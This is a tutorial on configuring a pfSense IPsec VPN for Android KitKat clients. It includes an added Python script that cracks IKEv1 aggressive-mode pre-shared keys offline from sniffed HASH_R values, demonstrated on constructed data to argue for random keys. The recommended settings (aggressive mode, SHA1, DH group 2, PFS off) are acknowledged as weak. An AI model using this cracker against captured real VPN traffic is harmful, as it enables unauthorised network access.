Getting an Android KitKat device to connect to a pfSense IPsec VPN server is a finicky process: the settings on both sides need to match exactly, and the built-in Android client only supports a small subset of the common proposals. This article shows the settings that work.

pfSense IPSec settings

System -> User Manager -> Groups

Add a new group with the following template.

Group name: Mobile VPN
Description: IPSec VPN users
Assigned Privileges: User – VPN – IPsec xauth Dialin

System -> User Manager -> Users

Add a new user with the following template.

Username: <this will be this user’s VPN ID>
Password: <use a password generator>
Group memberships: Mobile VPN
IPSec Pre-Shared Key: <this will be the user’s VPN PSK>

Phase 1 Proposal (authentication)

Authentication method: Mutual PSK + Xauth
Negotiation mode: Aggressive
My identifier: Distinguished Name <not used>
Peer identifier: Distinguished Name <not used>
Pre-Shared Key: <not used, random data>
Policy Generation: Unique
Proposal Checking: Strict
Encryption algorithm: AES 128 bits
Hash algorithm: SHA1
DH key group: 2 (1024 bit)
Lifetime: 86400

Note: with a pre-shared key, aggressive mode sends the responder's authentication hash (HASH_R) in the clear, so anyone who captures the exchange can guess the PSK offline at their leisure; SHA1 and the 1024-bit DH group 2 are also below current recommendations. These are the settings the KitKat client was found to accept, so the compensating control is a long, random, per-user PSK and a strong Xauth password rather than a different proposal.
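
To make the aggressive-mode point concrete, here is an added example (not code from the article or from pfSense) that reproduces the RFC 2409 HASH_R computation for the page's phase 1 settings (PSK authentication, SHA1, so the prf is HMAC-SHA1) and runs a wordlist against it. Every field of the "captured" exchange is constructed inline; the `_fake`, `constructed_exchange`, `crack_psk` and `generate_psk` names are this example's own, not anything pfSense or Android expose.

```python
"""Offline guessing of an IKEv1 aggressive-mode pre-shared key (RFC 2409 section 5).

Added example, not from the original article. In aggressive mode the responder
sends HASH_R in the clear, and every other input to that hash (nonces, DH public
values, cookies, SA payload body, responder ID) is also visible on the wire, so an
eavesdropper can test PSK guesses offline. All values below are constructed for
the demo, not captured from a real pfSense/Android session.
"""
import hashlib
import hmac
import secrets
from typing import Iterable, Optional


def prf(key: bytes, data: bytes) -> bytes:
    """IKEv1 prf for the article's phase 1 hash algorithm (SHA1) is HMAC-SHA1."""
    return hmac.new(key, data, hashlib.sha1).digest()


def skeyid_psk(psk: bytes, ni_b: bytes, nr_b: bytes) -> bytes:
    """SKEYID for pre-shared-key authentication: prf(PSK, Ni_b | Nr_b)."""
    return prf(psk, ni_b + nr_b)


def hash_r(psk: bytes, x: dict) -> bytes:
    """HASH_R = prf(SKEYID, g^xr | g^xi | CKY-R | CKY-I | SAi_b | IDir_b)."""
    skeyid = skeyid_psk(psk, x["ni_b"], x["nr_b"])
    return prf(skeyid, x["gxr"] + x["gxi"] + x["cky_r"] + x["cky_i"]
               + x["sai_b"] + x["idir_b"])


def _fake(label: str, length: int) -> bytes:
    """Deterministic stand-in for a sniffed field (constructed test data)."""
    return hashlib.shake_256(label.encode()).digest(length)


def constructed_exchange() -> dict:
    """Stand-in for the fields parsed from the first two aggressive-mode packets."""
    return {
        "ni_b": _fake("initiator nonce", 20),
        "nr_b": _fake("responder nonce", 20),
        "gxi": _fake("initiator DH public value, group 2", 128),
        "gxr": _fake("responder DH public value, group 2", 128),
        "cky_i": _fake("initiator cookie", 8),
        "cky_r": _fake("responder cookie", 8),
        "sai_b": _fake("SA payload body offered by the initiator", 48),
        # ID payload body: type 2 (ID_FQDN), protocol 0, port 0, then the name.
        "idir_b": bytes([2, 0, 0, 0]) + b"vpn.example.com",
    }


def crack_psk(observed_hash_r: bytes, x: dict, wordlist: Iterable[str]) -> Optional[str]:
    """Return the first candidate PSK that reproduces the sniffed HASH_R, else None."""
    for cand in wordlist:
        if hmac.compare_digest(hash_r(cand.encode(), x), observed_hash_r):
            return cand
    return None


def generate_psk(nbytes: int = 32) -> str:
    """What the article means by 'use a password generator': 256 bits of randomness."""
    return secrets.token_urlsafe(nbytes)


# Tiny constructed wordlist; a real attacker would use millions of entries.
WORDLIST = ["password", "vpn", "vpn12345", "pfsense", "android"]

if __name__ == "__main__":
    x = constructed_exchange()
    weak = "vpn12345"
    print("weak PSK recovered:", crack_psk(hash_r(weak.encode(), x), x, WORDLIST))
    strong = generate_psk()
    print("random PSK recovered:", crack_psk(hash_r(strong.encode(), x), x, WORDLIST))
```

The loop is the whole attack: one HMAC-SHA1 pair per guess, no interaction with the server, so the only defence the page's settings leave is the entropy of the PSK itself.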

Phase 2 Proposal (SA/Key exchange)

Mode: Tunnel IPv4
Local Network Type: Network
Local Network Address: 0.0.0.0/0
Local Network NAT Type: None
Protocol: ESP
Encryption Algorithms: AES 128 bits (uncheck all others)
Hash Algorithms: SHA1 (uncheck all others)
PFS key group: Off
Lifetime: 28800

Mobile Clients

IKE Extensions: <checked>
Virtual Address Pool: <checked, enter unused VPN network>

Pre-Shared Keys

This should be auto-populated from what we did earlier in the user settings page.


Android KitKat settings

Name: <whatever you want, it’s just a label>
Type: IPSec Xauth PSK
Server Address: <FQDN/IP of your server>
IPSec identifier: <username>
IPSec pre-shared key: <username’s pre-shared key>
Username: <username>
Password: <username’s password>
